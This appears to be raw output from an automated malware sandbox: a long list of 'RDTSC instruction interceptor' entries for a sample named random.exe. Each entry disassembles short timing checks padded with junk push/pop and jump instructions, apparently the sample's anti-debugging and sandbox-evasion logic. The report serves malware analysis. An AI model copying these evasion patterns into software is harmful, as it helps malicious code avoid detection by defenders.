Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDA50E second address: FDA545 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FDD08CD5753h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007FDD08CD5754h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDA5DB second address: FDA5E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDAE80 second address: FDAE86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDB0FB second address: FDB114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDB114 second address: FDB133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edx 0x0000000b jmp 00007FDD08CD574Bh 0x00000010 pop edx 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDB133 second address: FDB139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDB1BB second address: FDB256 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FDD08CD574Fh 0x00000010 nop 0x00000011 call 00007FDD08CD5754h 0x00000016 jmp 00007FDD08CD5756h 0x0000001b pop ecx 0x0000001c jl 00007FDD08CD574Eh 0x00000022 lea eax, dword ptr [ebp+1247CB58h] 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007FDD08CD5748h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 0000001Bh 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 jmp 00007FDD08CD5757h 0x00000047 nop 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDB256 second address: FDB260 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDD093B1DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDB260 second address: FDB27D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD08CD5759h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDB27D second address: FDB281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1024552 second address: 1024562 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jno 00007FDD08CD5746h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1024562 second address: 102456C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FDD093B1DE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102456C second address: 1024576 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDD08CD5746h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1024576 second address: 1024589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FDD093B1DE6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1024589 second address: 102458F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102458F second address: 10245C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDD093B1DF5h 0x0000000d jmp 00007FDD093B1DF6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10249E0 second address: 10249F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FA2A5C second address: FA2A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FA2A63 second address: FA2ABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5758h 0x00000007 jmp 00007FDD08CD5759h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FDD08CD574Fh 0x00000014 jmp 00007FDD08CD5752h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F04A second address: 102F04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F04F second address: 102F054 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F054 second address: 102F06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FDD093B1DE6h 0x0000000a jc 00007FDD093B1DE6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007FDD093B1DE6h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F1C2 second address: 102F1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD08CD574Eh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FDD08CD5754h 0x00000010 jg 00007FDD08CD5746h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F354 second address: 102F37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jg 00007FDD093B1DECh 0x0000000d jnl 00007FDD093B1DE6h 0x00000013 pop ecx 0x00000014 pushad 0x00000015 jnc 00007FDD093B1DEEh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F4FE second address: 102F502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F502 second address: 102F508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F508 second address: 102F510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F510 second address: 102F524 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDD093B1DE6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F524 second address: 102F528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F528 second address: 102F542 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDD093B1DE6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 js 00007FDD093B1DE6h 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F542 second address: 102F54D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FDD08CD5746h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F54D second address: 102F553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F7C9 second address: 102F7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F7CF second address: 102F7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F7D4 second address: 102F7EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5750h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F7EA second address: 102F7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F7EE second address: 102F830 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5754h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007FDD08CD576Dh 0x00000011 jnl 00007FDD08CD5748h 0x00000017 push ebx 0x00000018 jmp 00007FDD08CD5757h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDACB8 second address: FDACCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD093B1DF2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDACCE second address: FDACD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F98F second address: 102F9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FDD093B1DE6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d js 00007FDD093B1DEEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F9A4 second address: 102F9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102FB2F second address: 102FB4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102FB4C second address: 102FB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FDD08CD5753h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102FB67 second address: 102FB6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10342D2 second address: 10342D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103389A second address: 10338C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 jo 00007FDD093B1DF6h 0x0000000e jnl 00007FDD093B1DECh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1033A56 second address: 1033A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1033A5A second address: 1033A73 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDD093B1DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FDD093B1DECh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1033E89 second address: 1033E95 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jns 00007FDD08CD5746h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1033E95 second address: 1033E9F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDD093B1DEEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1036CE0 second address: 1036CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1036CE4 second address: 1036CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103C591 second address: 103C59F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDD08CD5746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103C59F second address: 103C5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103C5A5 second address: 103C5A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103D46E second address: 103D478 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDD093B1DFFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103D7AA second address: 103D7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103FF7F second address: 103FF85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103FF85 second address: 103FF89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103FF89 second address: 103FF9E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDD093B1DEBh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103FF9E second address: 103FFA4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1047130 second address: 1047143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push esi 0x00000008 jne 00007FDD093B1DE6h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1047143 second address: 1047147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10472A4 second address: 10472C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD093B1DF9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10472C1 second address: 10472C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10472C5 second address: 10472D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10472D1 second address: 10472D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10472D5 second address: 10472D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10472D9 second address: 10472DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10472DF second address: 10472EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FDD093B1DEEh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10472EF second address: 104731E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007FDD08CD5752h 0x0000000c jnl 00007FDD08CD5754h 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1047576 second address: 1047582 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FDD093B1DE6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1047582 second address: 1047598 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FDD08CD5762h 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FDD08CD5746h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1047598 second address: 10475A2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10475A2 second address: 10475A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1047716 second address: 104771C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104771C second address: 1047723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104F04D second address: 104F06F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDD093B1DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDD093B1DF4h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104D3E6 second address: 104D3EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104D3EC second address: 104D401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD093B1DF1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104D401 second address: 104D407 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104D9BB second address: 104D9C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104D9C0 second address: 104D9CA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDD08CD574Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104E068 second address: 104E06E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104E06E second address: 104E072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104E798 second address: 104E79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104E79E second address: 104E7B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FDD08CD574Ch 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104E7B4 second address: 104E7BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104EEC7 second address: 104EED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FDD08CD5746h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104EED6 second address: 104EEDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104EEDA second address: 104EEE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104EEE0 second address: 104EEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007FDD093B1DE6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1055B18 second address: 1055B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1055B1D second address: 1055B25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1055B25 second address: 1055B2F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDD08CD5746h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1055B2F second address: 1055B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnp 00007FDD093B1DE6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106DE47 second address: 106DE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jne 00007FDD08CD5746h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1077190 second address: 10771A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007FDD093B1DEDh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10771A5 second address: 10771A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
